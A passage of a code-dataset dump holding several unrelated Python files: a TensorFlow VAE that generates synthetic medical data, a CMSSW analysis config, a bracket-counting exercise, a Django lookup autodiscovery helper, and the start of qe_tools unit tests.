config.gpu_options.allow_growth = True\n with tf.Session(config=config) as sess:\n writer = tf.summary.FileWriter(\"log/\", sess.graph)\n sess.run(tf.initialize_all_variables())\n idx = np.arange(data.shape[0])\n for epoch in range(self.epoches):\n np.random.shuffle(idx)\n for i in range(nbatches):\n start=i*self.batchsize;end=(i+1)*self.batchsize\n batchx=data[idx[start:end]]\n mean, stddev=sess.run([z_mean, z_stddev],feed_dict={self.inputs:batchx})\n _,geneloss,latentloss,regul_loss,loss = sess.run([self.optimizer,self.generation_loss,self.latent_loss,regular_loss, self.cost], feed_dict={self.inputs: batchx})\n\n if i%50==0:\n rs = sess.run(merged, feed_dict={self.inputs:batchx})\n writer.add_summary(rs, epoch*nbatches+i)\n #print(\"geneloss\", geneloss)\n buf='Epoch:%d,step:%d,geneloss:%f,latentloss:%f,regul_loss:%f,loss:%f'%(epoch,i,geneloss,latentloss,regul_loss,loss)\n #print('mean, stddev:',mean,stddev)\n print(buf)\n self.print2file(buf, logFile)\n if epoch%20==0:\n savePath=saver.save(sess,'checkpoint_ave/save_net.ckpt',global_step=epoch)\n print(savePath)\n\n def geneData(self,\n dataPath='data',\n nSamples=10000,\n modelFile='model',\n batchSize=1000,\n outFile=None):\n self.z=tf.placeholder(\"float\",[None,self.n_z])\n gene_data=self.generation(self.z)\n saver=tf.train.Saver()\n outputVec = []\n with tf.Session() as sess:\n saver.restore(sess, modelFile)\n print('generating')\n nBatches = int(np.ceil(float(nSamples) / float(batchSize)))\n for i in range(nBatches):\n randomX = np.random.normal(size=[batchSize,self.n_z])\n output = sess.run(gene_data, feed_dict={self.z: randomX})\n outputVec.extend(output)\n\n outputMat = np.array(outputVec)\n np.save(outFile, outputMat)\n self.check(outFile)\n\n def check(self,outFile):\n from scipy.sparse import csc_matrix\n \"\"\" translate float into int\"\"\"\n data = np.load(outFile)\n print(data.shape)\n data_train = []\n for li in data:\n raw_data = []\n for i, lj in enumerate(li):\n if lj >= 0.5:\n raw_data.append(1)\n else:\n raw_data.append(0)\n data_train.append(raw_data)\n print(np.array(data_train))\n outputMat = np.array(data_train)\n #index主要是为了去除不符合要求的数据,比如全零行。\n index = list(set(np.where(outputMat[:,:1960])[0]))\n np.save(outFile, outputMat[index])\n\n \"\"\"检查一下生成的数据情况\"\"\"\n real_data = np.load(\"/home/deermini/PycharmProjects/medical-analysis/GAN for medical/input_data.npy\")\n gene_data = np.load(outFile)\n print(real_data.shape)\n print(gene_data.shape)\n #print(csc_matrix(gene_data))\n\n for li in gene_data[:30]:\n print(\"==============================\")\n print(csc_matrix(li[:1960]))\n print()\n print(csc_matrix(li[1960:]))\n\n print(\"shape:\", gene_data.shape)\n\nmodel = LatentAttention()\nmodel.train()\noutpath=\"data/gene_vaedata_toint.npy\"\nmodel.geneData(nSamples=18000,\n modelFile=\"checkpoint_ave/save_net.ckpt-500\",\n outFile=outpath)\n","sub_path":"VAE/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":10327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"403774649","text":"import FWCore.ParameterSet.Config as cms\n#from mAOD_GravFiles import *\n#from mAOD_RadFiles import *\nfrom microAOD_RadFiles import *\n\nprocess = cms.Process(\"bbggtruthdiff\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\nprocess.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32( 2000 )\n\nprocess.source = cms.Source(\"PoolSource\",\n # replace 'myfile.root' 
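Two expressions carry the whole VAE above: the reparameterized sample guessed_z = z_mean + z_stddev * samples and the Gaussian KL penalty 0.5 * sum(mu^2 + sigma^2 - log(sigma^2) - 1). Here is a framework-free numpy rendering of just those two pieces, with toy shapes standing in for the batch (the 1e-8 guard mirrors the graph above):

```python
import numpy as np

rng = np.random.default_rng(0)
mu = rng.normal(size=(4, 62))                        # z_mean for a toy batch
sigma = np.log1p(np.exp(rng.normal(size=(4, 62))))   # softplus keeps stddev > 0

# Reparameterization trick: sample z while keeping mu/sigma differentiable.
eps = rng.normal(size=mu.shape)
z = mu + sigma * eps

# KL(N(mu, sigma^2) || N(0, 1)), summed over latent dims, one value per row.
kl = 0.5 * np.sum(mu**2 + sigma**2 - np.log(1e-8 + sigma**2) - 1, axis=1)
print(z.shape, kl.mean())
```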
with the source file you want to use\n fileNames = cms.untracked.vstring(\n#'file:/afs/cern.ch/work/r/rateixei/work/DiHiggs/FLASHggPreSel/CMSSW_7_4_0_pre9/src/flashgg/MicroAOD/test/hhbbgg_hggVtx.root' \n#'/store/user/rateixei/flashgg/RunIISpring15DR74/RunIISpring15MicroAODV1/GluGluToBulkGravitonToHHTo2B2G_M-260_narrow_13TeV-madgraph/RunIISpring15DR74-RunIISpring15MicroAODV1-v0-RunIISpring15DR74-Asympt25ns_MCRUN2_74_V9-v1/150615_144924/0000/microAOD_1.root'\n RadFiles['320']\n#\t\tGravFiles['270']\n )\n)\n\nprocess.load(\"flashgg.bbggTools.bbggTruthDiff_cfi\")\nprocess.bbggtruthdiff.OutFileName = cms.untracked.string('myPlots.root')\n\n\nprocess.p = cms.Path(process.bbggtruthdiff)\n","sub_path":"python/bbggTruthDiff_cfg.py","file_name":"bbggTruthDiff_cfg.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"294747708","text":"\ndef check(g):\n stack = []\n stack2 = []\n gs = list(map(str, g))\n for i in gs:\n if i == '(':\n stack.append(i)\n else:\n stack2.append(i)\n\n if len(stack) == len(stack2):\n return 'ok'\n else:\n return 'ㄴㄴ'\n\n\n\n\n\nprint(check('()()((()))'))","sub_path":"Algorithm/190820/연습문제2.py","file_name":"연습문제2.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"359565729","text":"def merge_dict(d1, d2):\n \"\"\"\n Merges two dictionaries into one new dict using copy()\n\n :param d1: Dict()\n :param d2: Dict()\n :return: Dict()\n \"\"\"\n merged = d1.copy()\n merged.update(d2)\n return merged\n\n\nclass AutoDiscover():\n\n def __getitem__(self, key):\n if not hasattr(self, 'channels'):\n self.channels = self.discover_channels()\n return self.channels[key]\n\n @staticmethod\n def discover_channels():\n from django.conf import settings\n from django.utils.importlib import import_module\n\n channels = {}\n\n for app in settings.INSTALLED_APPS:\n try:\n lookup = import_module('%s.lookup' % app)\n\n if hasattr(lookup, \"AJAX_LOOKUP_CHANNELS\"):\n channels = merge_dict(channels, lookup.AJAX_LOOKUP_CHANNELS)\n except:\n pass\n\n return channels","sub_path":"ajax_selects_autodiscover/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"614184435","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nfrom builtins import (bytes, dict, int, list, object, range, str, ascii, chr,\n hex, input, next, oct, open, pow, round, super, filter,\n map, zip)\n\nimport io\nimport os\nimport unittest\nimport json\n\nfrom qe_tools import PwInputFile, CpInputFile\nfrom qe_tools.utils.exceptions import InputValidationError\n\n# Folder with input file examples\ndata_folder = os.path.join(os.path.split(os.path.abspath(__file__))[0], 'data')\n# Folder with parsing comparison\nreference_folder = os.path.join(data_folder, 'ref')\n\n\nclass CustomTestCase(unittest.TestCase):\n \"\"\"\n Extension of the unittest TestCase to support also deep almost-equal\n comparisons of dicts\n )\n \"\"\"\n\n def assertNestedAlmostEqual(self, expected, actual, *args, **kwargs):\n \"\"\"\n Check that dict have almost equal content, for float content.\n Works recursively for dicts, tuples, lists, ... 
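Note that the check() snippet above never looks at ordering: it only compares the count of '(' against everything else, so an input like ')(' is reported as 'ok'. A stricter version tracks nesting depth; a sketch follows (check_balanced is a new name, not taken from the snippet):

```python
def check_balanced(s):
    # A ')' may only close a previously seen '('; depth going negative
    # means the string is unbalanced regardless of what follows.
    depth = 0
    for ch in s:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False
    return depth == 0

print(check_balanced("()()((()))"))  # True
print(check_balanced(")("))          # False, though the count-based check passes it
```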
Use\n :py:meth:`unittest.TestCase.assertEqual` except for numbers, where\n :py:meth:`unittest.TestCase.assertAlmostEqual` is used.\n Additional parameters are passed only to AlmostEqual\n \"\"\"\n import numpy\n is_root = not '__trace' in kwargs\n trace = kwargs.pop('__trace', 'ROOT')\n try:\n if isinstance(expected, (int, float, complex)):\n self.assertAlmostEqual(expected, actual, *args, **kwargs)\n elif isinstance(expected, (list, tuple, numpy.ndarray)):\n self.assertEqual(len(expected), len(actual))\n for index in range(len(expected)):\n v1, v2 = expected[index], actual[index]\n self.assertNestedAlmostEqual(v1,\n v2,\n __trace=repr(index),\n *args,\n **kwargs)\n elif isinstance(expected, dict):\n self.assertEqual(set(expected), set(actual))\n for key in expected:\n self.assertNestedAlmostEqual(expected[key],\n actual[key],\n __trace=repr(key),\n *args,\n **kwargs)\n else:\n self.assertEqual(expected, actual)\n except AssertionError as exc:\n exc.__dict__.setdefault('traces', []).append(trace)\n if is_root:\n trace = ' -> '.join(reversed(exc.traces))\n exc = AssertionError(\"%s\\nTRACE: %s\" % (str(exc), trace))\n raise exc\n\n def assertNestedAlmostEqualOnlyKeysInFirst(self, expected, actual, *args,\n **kwargs):\n \"\"\"\n Check that dict have almost equal content, for float content.\n\n Check only keys in first dictionary (i.e. if it contains less keys,\n only those are checked).\n Works recursively for dicts, tuples, lists, ... Use\n :py:meth:`unittest.TestCase.assertEqual` except for numbers, where\n :py:meth:`unittest.TestCase.assertAlmostEqual` is used.\n Additional parameters are passed only to AlmostEqual\n \"\"\"\n import numpy\n is_root = not '__trace' in kwargs\n trace = kwargs.pop('__trace', 'ROOT')\n try:\n if isinstance(expected, (int, float, complex)):\n self.assertAlmostEqual(expected, actual, *args, **kwargs)\n elif isinstance(expected, (list, tuple, numpy.ndarray)):\n self.assertEqual(len(expected), len(actual))\n for index in range(len(expected)):\n v1, v2 = expected[index], actual[index]\n self.assertNestedAlmostEqual(v1,\n v2,\n __trace=repr(index),\n *args,\n **kwargs)\n elif isinstance(expected, dict):\n self.assertEqual(set(expected),\n set(actual).intersection(set(expected)))\n for key in expected:\n self.assertNestedAlmostEqualOnlyKeysInFirst(\n expected[key],\n actual[key],\n __trace=repr(key),\n *args,\n **kwargs)\n else:\n self.assertEqual(expected, actual)\n except AssertionError as exc:\n exc.__dict__.setdefault('traces', []).append(trace)\n if is_root:\n trace = ' -> '.join(reversed(exc.traces))\n exc = AssertionError(\"%s\\nTRACE: %s\" % (str(exc), trace))\n raise exc\n\n\nclass PwTest(CustomTestCase):\n def singletest(self, label, parser='pw'):\n \"\"\"\n Run a single test.\n\n :param label: used to generate the filename (